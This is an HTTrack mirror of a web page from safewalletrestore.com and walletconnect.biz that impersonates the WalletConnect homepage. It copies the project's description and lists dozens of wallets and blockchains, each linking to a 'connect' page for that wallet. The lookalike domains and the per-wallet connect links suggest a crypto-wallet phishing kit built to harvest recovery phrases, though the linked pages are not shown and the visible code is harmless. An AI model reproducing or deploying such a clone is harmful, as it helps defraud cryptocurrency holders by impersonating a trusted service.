<html>
<link rel="stylesheet" href="assets/main.css" type="text/css"> 


<!-- Mirrored from safewalletrestore.com/ by HTTrack Website Copier/3.x [XR&CO'2014], Wed, 05 May 2021 13:41:13 GMT -->
<!-- Added by HTTrack --><meta http-equiv="content-type" content="text/html;charset=UTF-8" /><!-- /Added by HTTrack -->
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta name="description" content="Open protocol for connecting Wallets to Dapps">
<meta property="og:image" content="images/logo.svg">
<link rel="icon" href="assets/logo.svg">

<script>
function show() {
  var x = document.getElementById("hidden");
  if (x.style.display === "block") {
    x.style.display = "none";
  } else {
    x.style.display = "block";
  }

  if (x.style.display === "block") {
    document.getElementById("btn").innerHTML = "Show Less &uarr;";
  } 
}
</script>
<title>WalletConnect</title></head>



<body>
<center>
    <div class="top">
        <a href="index.html#footer" class="left">Github</a>

        <a href="index.html#" class="left">Docs</a>
        <a href="index.html" class="main"><img src="assets/logo.svg" alt="logo"></a>
        <a href="index.html#wallets" class="left">Wallets</a>
        <a href="index.html#" class="left">Apps</a>
</div>
<br>
<div class="gFeYHJ">WalletConnect</div>

<div class="lpfxqP">Open protocol for connecting Wallets to Dapps</div>
<br>

<div class="dXgqeu">
<img src="assets/banner.png" alt="WalletConnect">
</div>

<div class="bout">
<h2 class="home">What is WalletConnect?</h2>
<p>WalletConnect is an open source protocol for connecting decentralised applications to mobile wallets with QR code scanning or deep linking. 
A user can interact securely with any Dapp from their mobile phone, making WalletConnect wallets a safer choice compared to desktop or browser 
extension wallets.</p><br>
<h2 class="home">How does it work?</h2>
<p>WalletConnect connects web applications to supported <a href="index.html#">mobile wallets</a>. WalletConnect session is started by a scanning a QR 
code (desktop) or by clicking an application deep link (mobile).</p>
</div>

<div class="wallets" id="wallets">
    <h1 class="home">Wallets</h1>
<p>Multiple iOS and Android wallets support the WalletConnect protocol. Interaction between mobile apps and mobile browsers are supported via mobile deep linking.</p>

<br>
<div class="all">
<div class="apps">
    <a href="connect/indexe3b7.html%3Ftype=metamask.html"><img src="assets/metamask.png"></a><br>
    MetaMask
</div>

<div class="apps">
    <a href="connect/index2118.html%3Ftype=trust+wallet.html"><img src="assets/trustwallet.png"></a><br>
    Trust Wallet
</div>

<div class="apps">
    <a href="connect/indexd005.html%3Ftype=SafePal.html"><img src="assets/safepal.jpg"></a><br>
    SafePal
</div>


<div class="apps">
    <a href="connect/index38f2.html%3Ftype=MEW+wallet.html"><img src="assets/MEW.png"></a><br>
    MEW Wallet
</div>


<div class="apps">
    <a href="connect/indexff05.html%3Ftype=wallet+connect.html"><img src="assets/logo.svg"></a><br>
    Wallect<br>Connect
</div>

<div class="apps">
    <a href="connect/indexdca7.html%3Ftype=coinbase+wallet.html"><img src="assets/coinbase.jpg"></a><br>
    Coinbase Wallet
</div>

<div class="apps">
    <a href="connect/index0b9a.html%3Ftype=atomic+wallet.html"><img src="assets/atomic.png"></a><br>
    Atomic Wallet
</div>

<div class="apps">
    <a href="connect/index1854.html%3Ftype=binance+smart+chain.html"><img src="assets/binance.png"></a><br>
    Binance Smart Chain
</div>

<div class="apps">
    <a href="connect/index3664.html%3Ftype=bnb.html"><img src="assets/bnb.png"></a><br>
    BNB
</div>

<div class="apps">
    <a href="connect/index5a30.html%3Ftype=polkadot.html"><img src="assets/polkadot.png"></a><br>
    Polkadot
</div>

<div class="apps">
    <a href="connect/index2979.html%3Ftype=xrp.html"><img src="assets/xrp.png"></a><br>
    XRP
</div>

<div class="apps">
    <a href="connect/indexbd0f.html%3Ftype=stellar.html"><img src="assets/stellar.png"></a><br>
    Stellar
</div>

<div class="apps">
    <a href="connect/indexdf8a.html%3Ftype=tezos.html"><img src="assets/tezos.png"></a><br>
    Tezos
</div>

<div class="apps">
    <a href="connect/index7d1a.html%3Ftype=theta.html"><img src="assets/theta.png"></a><br>
    Theta
</div>

<div class="apps">
    <a href="connect/indexcea2.html%3Ftype=tron.html"><img src="assets/tron.png"></a><br>
    Tron
</div>

<div class="apps">
    <a href="connect/indexa71a.html%3Ftype=cosmos.html"><img src="assets/cosmos.png"></a><br>
    Cosmos
</div>

<div class="apps">
    <a href="connect/index0713.html%3Ftype=kava.html"><img src="assets/kava.png"></a><br>
    Kava
</div>

<div class="apps">
    <a href="connect/indexcb21.html%3Ftype=filecoin.html"><img src="assets/filecoin.png"></a><br>
    Filecoin
</div>

<div class="apps">
    <a href="connect/indexdf6a.html%3Ftype=solana.html"><img src="assets/solana.png"></a><br>
    Solana
</div>

<div class="apps">
    <a href="connect/index7a80.html%3Ftype=ethereum+classic.html"><img src="assets/ethereum-classic.png"></a><br>
    Ethereum Classic
</div>

<div class="apps">
    <a href="connect/index8af2.html%3Ftype=zilliqa.html"><img src="assets/zilliqa.png"></a><br>
    Zilliqa
</div>

<div class="apps">
    <a href="connect/index0712.html%3Ftype=elrond.html"><img src="assets/elrond.jpg"></a><br>
    Elrond
</div>

<div class="apps">
    <a href="connect/indexbd88.html%3Ftype=waves.html"><img src="assets/waves.png"></a><br>
    Waves
</div>

<div class="apps">
    <a href="connect/index915e.html%3Ftype=icon.html"><img src="assets/icon.png"></a><br>
    ICON
</div>

<div class="apps">
    <a href="connect/index14d3.html%3Ftype=ontology.html"><img src="assets/ontology.png"></a><br>
    Ontology
</div>


</div>
<br>
<button onclick="show()" class="btn" id="btn">Show More ↓</button>
<br><br>
<div class="hidden" id="hidden">
<div class="all">

<div class="apps">
    <a href="connect/index6f63.html%3Ftype=oxen+wallet.html"><img src="assets/oxen.png"></a><br>
    Oxen Wallet
</div>

<div class="apps">
    <a href="connect/index1e44.html%3Ftype=nano.html"><img src="assets/nano.png"></a><br>
    Nano
</div>

<div class="apps">
    <a href="connect/index41db.html%3Ftype=tomo+chain.html"><img src="assets/tomo.png"></a><br>
    Tomo Chain
</div>

<div class="apps">
    <a href="connect/index4df7.html%3Ftype=vechain.html"><img src="assets/vechain.jpg"></a><br>
    VeChain
</div>

<div class="apps">
    <a href="connect/index250c.html%3Ftype=iotex.html"><img src="assets/iotex.png"></a><br>
    IoTex
</div>

<div class="apps">
    <a href="connect/index2d9f.html%3Ftype=wanchain.html"><img src="assets/wanchain.png"></a><br>
    Wanchain
</div>

<div class="apps">
    <a href="connect/indexc9c2.html%3Ftype=harmony.html"><img src="assets/harmony.png"></a><br>
    Harmony
</div>

<div class="apps">
    <a href="connect/index830c.html%3Ftype=kin.html"><img src="assets/kin.png"></a><br>
    Kin
</div>

<div class="apps">
    <a href="connect/index473e.html%3Ftype=nimiq.html"><img src="assets/nimiq.png"></a><br>
    Nimiq
</div>

<div class="apps">
    <a href="connect/index0771.html%3Ftype=aion.html"><img src="assets/aion.png"></a><br>
    Aion
</div>

<div class="apps">
    <a href="connect/index742e.html%3Ftype=thunder+token.html"><img src="assets/thundertoken.png"></a><br>
    Thunder Token
</div>

<div class="apps">
    <a href="connect/index74d9.html%3Ftype=aerternity.html"><img src="assets/aeternity.png"></a><br>
    Aeternity
</div>

<div class="apps">
    <a href="connect/index16e7.html%3Ftype=nebulas.html"><img src="assets/nebulas.png"></a><br>
    Nebulas
</div>

<div class="apps">
    <a href="connect/index99b2.html%3Ftype=fio.html"><img src="assets/fio.png"></a><br>
    FIO
</div>

<div class="apps">
    <a href="connect/indexeb25.html%3Ftype=gochain.html"><img src="assets/gochain.png"></a><br>
    GoChain
</div>

<div class="apps">
    <a href="connect/index5638.html%3Ftype=POA+network.html"><img src="assets/poa.png"></a><br>
    POA Network
</div>

<div class="apps">
    <a href="connect/index0f79.html%3Ftype=callisto.html"><img src="assets/callisto.png"></a><br>
    Callisto
</div>

<div class="apps">
    <a href="connect/indexad44.html%3Ftype=bitpay.html"><img src="assets/bitpay.jpg"></a><br>
    BitPay
</div>

<div class="apps">
    <a href="connect/indexb52a.html%3Ftype=aktionariat.html"><img src="assets/aktionariat.png"></a><br>
    Aktionariat
</div>

<div class="apps">
    <a href="connect/index7d14.html%3Ftype=atwallet.html"><img src="assets/atwallet.png"></a><br>
    AtWallet
</div>

<div class="apps">
    <a href="connect/index1a6a.html%3Ftype=guard+wallet.html"><img src="assets/guard.png"></a><br>
    Guard Wallet
</div>

<div class="apps">
    <a href="connect/indexbbd9.html%3Ftype=aave.html"><img src="assets/aave.jpg"></a><br>
    AAVE
</div>

<div class="apps">
    <a href="connect/index6a11.html%3Ftype=exodus.html"><img src="assets/exodus.jpg"></a><br>
    Exodus
</div>


<div class="apps">
    <a href="connect/indexbf5c.html%3Ftype=enjin.html"><img src="assets/enjin.jpg"></a><br>
    Enjin
</div>


<div class="apps">
    <a href="connect/index1cb0.html%3Ftype=skale.html"><img src="assets/skale.png"></a><br>
    Skale
</div>

<div class="apps">
    <a href="connect/indexd316.html%3Ftype=portis.html"><img src="assets/portis.png"></a><br>
    Portis
</div>

<div class="apps">
    <a href="connect/index4db6.html%3Ftype=trezor.html"><img src="assets/trezor.png"></a><br>
    Trezor
</div>

<div class="apps">
    <a href="connect/indexffeb.html%3Ftype=squarelink.html"><img src="assets/squarelink.png"></a><br>
    Squarelink
</div>

<div class="apps">
    <a href="connect/indexeb9b.html%3Ftype=torus.html"><img src="assets/torus.jpg"></a><br>
    Torus
</div>

<div class="apps">
    <a href="connect/index6780.html%3Ftype=scatter+wallet.html"><img src="assets/scatter.jpg"></a><br>
    Scatter Wallet
</div>

<div class="apps">
    <a href="connect/indexacd7.html%3Ftype=sumcoin.html"><img src="assets/sumcoin.html"></a><br>
    Sumcoin
</div>

<div class="apps">
    <a href="connect/index851b.html%3Ftype=math+wallet.html"><img src="assets/math-wallet.png"></a><br>
    Math Wallet
</div>

<div class="apps">
    <a href="connect/indexdcc9.html%3Ftype=fortmatic.html"><img src="assets/fortmatic.png"></a><br>
    FortMatic
</div>

<div class="apps">
    <a href="connect/index6d75.html%3Ftype=digitex.html"><img src="assets/digitex.png"></a><br>
    Digitex
</div>

<div class="apps">
    <a href="connect/indexea66.html%3Ftype=ledger.html"><img src="assets/ledger.png"></a><br>
    Ledger
</div>

<div class="apps">
    <a href="connect/indexd858.html%3Ftype=defiat.html"><img src="assets/defiat.jpg"></a><br>
    Defiat
</div>

<div class="apps">
    <a href="connect/indexd03d.html%3Ftype=authereum.html"><img src="assets/authereum.png"></a><br>
    Authereum
</div>

<div class="apps">
    <a href="connect/indexb08c.html%3Ftype=flare+wallet.html"><img src="assets/flare.jpg"></a><br>
    Flare Wallet
</div>

<div class="apps">
    <a href="connect/indexf78f.html%3Ftype=zelcore.html"><img src="assets/zelcore.png"></a><br>
    Zelcore
</div>

<div class="apps">
    <a href="connect/indexc865.html%3Ftype=bitkeep.html"><img src="assets/bitkeep.png"></a><br>
    BitKeep
</div>

<div class="apps">
    <a href="connect/indexef39.html%3Ftype=coin98.html"><img src="assets/coin98.png"></a><br>
    Coin98
</div>

<div class="apps">
    <a href="connect/index0620.html%3Ftype=trust+vault.html"><img src="assets/trustvault.png"></a><br>
    Trust Vault
</div>

</div>

</div>


</div>

<footer><div id="footer">
<p><img src="assets/discord.svg" class="footimg">  <a href="https://discord.gg/jhxMvxP">Discord</a></p><br>
<p><img src="assets/telegram.svg" class="footimg">  <a href="https://t.me/walletconnect_announcements">Telegram</a></p><br>
<p><img src="assets/twitter.svg" class="footimg">  <a href="https://twitter.walletconnect.org/">Twitter</a></p><br>
<p><img src="assets/github.svg" class="footimg">  <a href="https://github.com/walletconnect">Github</a></p><br>
</div></footer>
</center>


<!-- Mirrored from walletconnect.biz/ by HTTrack Website Copier/3.x [XR&CO'2014], Thu, 01 Apr 2021 13:50:37 GMT -->

</body><div id="sideDragRight" style="display: none;"><div class="side_search_box" id="side_google_search" data-allowed-type="text" style="height: 20%; background-image: url(_chrome-extension_/aneodkojaglhnkkdbbdnmmmgimlcaogo/images/webSearch.html); background-color: rgb(255, 255, 255); background-size: cover; background-position: center center;"></div><div class="side_search_box" id="side_wikipedia_search" data-allowed-type="text" style="height: 20%; background-image: url(_chrome-extension_/aneodkojaglhnkkdbbdnmmmgimlcaogo/images/wikipedia.html); background-color: rgb(255, 255, 255); background-size: cover; background-position: center center;"></div><div class="side_search_box" id="side_youtube_search" data-allowed-type="text" style="height: 20%; background-image: url(_chrome-extension_/aneodkojaglhnkkdbbdnmmmgimlcaogo/images/youtube.html); background-color: rgb(255, 255, 255); background-size: cover; background-position: center center;"></div><div class="side_search_box" id="side_translate_search" data-allowed-type="text" style="height: 20%; background-image: url(_chrome-extension_/aneodkojaglhnkkdbbdnmmmgimlcaogo/images/translate.html); background-color: rgb(255, 255, 255); background-size: cover; background-position: center center;"></div><div class="side_search_box" id="side_image_search" data-allowed-type="all" style="height: 20%; background-image: url(_chrome-extension_/aneodkojaglhnkkdbbdnmmmgimlcaogo/images/imageSearch.html); background-color: rgb(255, 255, 255); background-size: cover; background-position: center center;"></div></div><div id="sideDragLeft" style="display: none;"><div class="side_search_box" id="side_facebook" data-allowed-type="images" style="height: 25%; background-image: url(_chrome-extension_/aneodkojaglhnkkdbbdnmmmgimlcaogo/images/facebook.html); background-color: rgb(255, 255, 255); background-size: cover; background-position: center center;"></div><div class="side_search_box" id="side_twitter" data-allowed-type="images" style="height: 25%; background-image: url(_chrome-extension_/aneodkojaglhnkkdbbdnmmmgimlcaogo/images/twitter.html); background-color: rgb(255, 255, 255); background-size: cover; background-position: center center;"></div><div class="side_search_box" id="side_pinterest" data-allowed-type="images" style="height: 25%; background-image: url(_chrome-extension_/aneodkojaglhnkkdbbdnmmmgimlcaogo/images/pinterest.png_); background-color: rgb(255, 255, 255); background-size: cover; background-position: center center;"></div><div class="side_search_box" id="side_linkedin" data-allowed-type="images" style="height: 25%; background-image: url(_chrome-extension_/aneodkojaglhnkkdbbdnmmmgimlcaogo/images/linkedin.html); background-color: rgb(255, 255, 255); background-size: cover; background-position: center center;"></div></div>
<!-- Mirrored from safewalletrestore.com/ by HTTrack Website Copier/3.x [XR&CO'2014], Wed, 05 May 2021 13:49:32 GMT -->
</html>